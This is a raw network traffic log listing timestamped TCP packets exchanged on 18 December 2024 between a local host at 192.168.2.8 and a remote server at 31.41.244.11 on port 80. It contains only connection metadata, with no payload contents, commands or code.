Dec 18, 2024 13:38:13.613542080 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.614130020 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.614168882 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.614238024 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.614274979 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.615114927 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.615125895 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.615153074 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.615171909 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.616058111 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.616117001 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.616125107 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.616173029 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.616995096 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.617046118 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.617202044 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.617255926 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.618026972 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.618071079 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.618522882 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.618558884 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.619096994 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.619141102 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.619211912 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.619251013 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.620110989 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.620151997 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.620229959 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.620269060 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.621210098 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.621252060 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.621323109 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.621361017 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.622234106 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.622272015 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.622334003 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.622369051 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.623121023 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.623133898 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.623162985 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.624140978 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.624182940 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.624243021 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.624281883 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.625004053 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.625039101 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.625180960 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.625222921 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.626045942 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.626087904 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.626256943 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.626296997 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.627109051 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.627120972 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.627146959 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.627160072 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.767465115 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.767482996 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.767529011 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.767549038 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.767649889 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.767693996 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.767945051 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.767988920 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.768872023 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.768915892 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.769009113 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.769052029 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.769670010 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.769735098 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.769804001 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.769849062 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.770724058 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.770770073 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.770834923 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.770879030 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.771657944 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.771702051 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.771773100 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.771816969 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.772720098 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.772763968 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.772870064 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.772912979 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.774122953 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.774168015 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.774281025 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.774322987 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.775131941 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.775208950 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.775296926 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.775751114 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.775803089 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.775903940 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.775949955 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.776674986 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.776721001 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.776837111 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.776880980 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.777673006 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.777720928 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.777777910 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.777818918 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.778724909 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.778770924 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.778800964 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.778839111 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.779851913 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.779891968 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.779928923 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.779944897 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.780759096 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.780802965 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.780805111 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.780848980 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.781744003 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.781790018 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.781884909 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.781925917 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.782892942 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.782937050 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.783013105 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.783063889 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.783732891 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.783801079 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.783823013 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.783837080 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.784778118 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.784791946 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.784825087 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.785792112 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.785836935 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.786076069 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.786115885 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.786717892 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.786761999 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.786828041 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.786874056 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.787707090 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.787754059 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.787792921 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.787834883 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.788861990 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.788877010 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.788904905 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.788919926 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.789700031 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.789743900 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.789781094 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.789822102 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.790899038 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.790919065 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.790955067 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.792231083 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.792247057 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.792279959 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.792752981 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.792800903 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.792895079 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.792936087 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.793687105 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.793730021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.794053078 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.794095993 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.794915915 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.794929981 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.794962883 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.795698881 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.795747042 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.795830011 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.795871019 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.796752930 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.796793938 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.797472000 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.797527075 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.797801018 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.797812939 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.797848940 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.797862053 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.798700094 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.798748016 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.798815012 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.798850060 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.799716949 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.799767971 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.800203085 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.800246954 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.800801039 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.800848007 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.800879955 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.800920010 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.801659107 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.801707029 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.801835060 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.801877975 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.802694082 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.802745104 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.802798986 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.802841902 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.803733110 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.803786039 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.803994894 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.804038048 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.804737091 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.804785013 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.804920912 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.804960012 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.805767059 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.805814981 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.805843115 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.805880070 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.806708097 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.806770086 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.806858063 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.806898117 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.807945013 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.807957888 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.807986975 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.808008909 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.808832884 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.808875084 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.808904886 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.808940887 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.809824944 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.809835911 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.809873104 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.810879946 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.810892105 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.810931921 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.811737061 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.811781883 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.811948061 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.811990023 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.812762022 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.812824011 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.812987089 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.813028097 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.813956022 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.813967943 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.814002037 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.814853907 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.814866066 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.814902067 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.815874100 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.815915108 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.815969944 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.816015959 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.816889048 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.816931009 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.816958904 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.816999912 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.817743063 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.817785025 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.817832947 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.817869902 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.818723917 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.818793058 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.818841934 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.818878889 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.819741011 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.819783926 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.960041046 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.960119009 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.960330963 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.960367918 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.960412979 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.960485935 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.960540056 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.961266041 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.961324930 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.961384058 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.961436033 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.962234974 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.962294102 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.962354898 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.962404966 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.963372946 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.963409901 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.963478088 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.964317083 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.964385986 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.964442968 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.964520931 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.965719938 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.965756893 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.965779066 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.965805054 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.966614962 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.966681957 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.966736078 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.967370987 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.967418909 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.967426062 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.967515945 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.968276024 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.968328953 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.968352079 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.968400955 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.969238043 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.969300032 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.969337940 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.969397068 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.970280886 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.970333099 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.970335960 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.970386028 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.971353054 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.971406937 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.971409082 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.971462011 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.972249985 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.972304106 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.972363949 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.973258018 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.973320007 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.973395109 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.973474026 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.974325895 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.974390984 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.974545956 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.974601984 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.975265026 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.975351095 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.975395918 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.975457907 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.976294041 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.976423979 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.976497889 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.977260113 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.977323055 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.977365017 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.977427006 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.978235960 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.978326082 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.978394032 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.978451014 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.979372978 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.979408979 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.979434013 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.980334997 CET	80	49708	31.41.244.11	192.168.2.8
